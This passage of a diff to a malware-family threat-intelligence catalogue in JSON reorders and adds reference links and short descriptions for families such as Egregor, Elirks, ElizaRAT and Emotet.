insertion of a ransom note named \u201cRECOVER-FILES.txt\u201d in all the compromised folders. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", - "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", - "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", - "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html", - "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/", - "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/", - "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", + "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/", + "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", + "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/", + "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.group-ib.com/blog/egregor", "https://www.intrinsec.com/egregor-prolock/", + "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", + "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/", + "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", + "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/", + "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", + "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/", + "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf", + "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", + "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", "https://twitter.com/redcanary/status/1334224861628039169", - "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/", - "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/", - "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", - "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf", - "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", - "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.group-ib.com/blog/egregor", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor", - "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/", - "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", - "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia", - "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/", - "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", - "https://securelist.com/targeted-ransomware-encrypting-data/99255/" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -23064,8 +24155,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish", "https://www.us-cert.gov/ncas/analysis-reports/AR19-129A", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf" ], "synonyms": [], "type": [] @@ -23087,11 +24178,12 @@ "value": "ElectricPowder" }, { - "description": "", + "description": "Elirks is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems. Mostly attacks using Elirks occurring in East Asia. One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS. Attackers create accounts on those services and post encoded IP addresses or the domain names of real C2 servers in advance of distributing the backdoor. Multiple Elirks variants using Japanese blog services for the last couple of years.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/", + "https://unit42.paloaltonetworks.com/unit42-tracking-elirks-variants-in-japan-similarities-to-previous-attacks/" ], "synonyms": [], "type": [] @@ -23104,16 +24196,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", - "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-elgin", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", + "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf", + "https://www.joesecurity.org/blog/8409877569366580427", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.secureworks.com/research/threat-profiles/bronze-elgin", - "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html", - "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", - "https://www.joesecurity.org/blog/8409877569366580427" + "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html" ], "synonyms": [ "EVILNEST" @@ -23123,6 +24215,19 @@ "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", "value": "Elise" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eliza_rat", + "https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c13fc723-0fd8-4e27-b1d7-a71976ad0268", + "value": "ElizaRAT" + }, { "description": "This dropper masquerades itself as Adobe software, titled as Adobe.msi. It is used to executes the python written Backdoor used by this threat actor.", "meta": { @@ -23141,11 +24246,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer", - "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", - "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/", + "https://attack.mitre.org/software/S0064", "https://attack.mitre.org/groups/G0023", - "https://attack.mitre.org/software/S0064" + "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" ], "synonyms": [ "Elmost" @@ -23160,12 +24265,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", - "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", - "https://www.macnica.net/file/security_report_20160613.pdf", - "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/" + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", + "https://www.macnica.net/file/security_report_20160613.pdf" ], "synonyms": [], "type": [] @@ -23191,316 +24296,319 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", - "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html", - "https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return", - "https://www.youtube.com/watch?v=q8of74upT_g", - "https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf", - "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", - "https://www.esentire.com/security-advisories/emotet-activity-identified", - "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html", - "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", - "https://unit42.paloaltonetworks.com/c2-traffic/", - "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html", - "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html", - "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/", - "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b", - "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff", - "https://github.com/d00rt/emotet_research", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment", - "https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/", - "https://unit42.paloaltonetworks.com/emotet-command-and-control/", - "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", - "https://blogs.cisco.com/security/emotet-is-back", - "https://blog.threatlab.info/malware-analysis-emotet-infection/", - "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", - "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/", - "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code", - "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", - "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/", - "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", - "https://blog.talosintelligence.com/2020/11/emotet-2020.html", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf", - "https://pl-v.github.io/plv/posts/Emotet-unpacking/", - "https://intel471.com/blog/emotet-takedown-2021/", - "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", - "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", - "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", - "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros", - "https://www.bitsight.com/blog/emotet-botnet-rises-again", - "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents", - "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", - "https://unit42.paloaltonetworks.com/new-emotet-infection-method/", - "https://github.com/cecio/EMOTET-2020-Reversing", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://securelist.com/the-chronicles-of-emotet/99660/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis", - "https://hatching.io/blog/powershell-analysis", - "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", - "https://twitter.com/raashidbhatt/status/1237853549200936960", - "https://unit42.paloaltonetworks.com/emotet-thread-hijacking/", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://unit42.paloaltonetworks.com/domain-parking/", - "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams", - "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii", - "https://cyber.wtf/2021/11/15/guess-whos-back/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", - "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html", - "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures", - "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", - "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/", - "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html", - "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", - "https://www.hornetsecurity.com/en/security-information/emotet-is-back/", - "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html", - "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", - "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet", - "https://persianov.net/emotet-malware-analysis-part-2", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://www.youtube.com/watch?v=5_-oR_135ss", - "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", - "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html", - "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html", - "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html", - "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/", - "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", - "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/", - "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/", - "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/", - "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", - "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure", - "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", - "https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/", - "https://muha2xmad.github.io/unpacking/emotet-part-1/", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection", - "https://blog.talosintelligence.com/emotet-switches-to-onenote/", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", - "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html", - "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de", - "https://www.youtube.com/watch?v=8PHCZdpNKrw", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/", - "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet", - "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines", - "https://asec.ahnlab.com/en/33600/", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/", - "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/", - "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/", - "https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/", - "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://securelist.com/emotet-modules-and-recent-attacks/106290/", - "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", - "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", - "https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure", - "https://twitter.com/eduardfir/status/1461856030292422659", - "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/", - "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis", - "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", - "https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/", - "https://persianov.net/emotet-malware-analysis-part-1", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728", - "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", - "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf", - "https://www.tgsoft.it/files/report/download.asp?id=7481257469", - "https://github.com/mauronz/binja-emotet", - 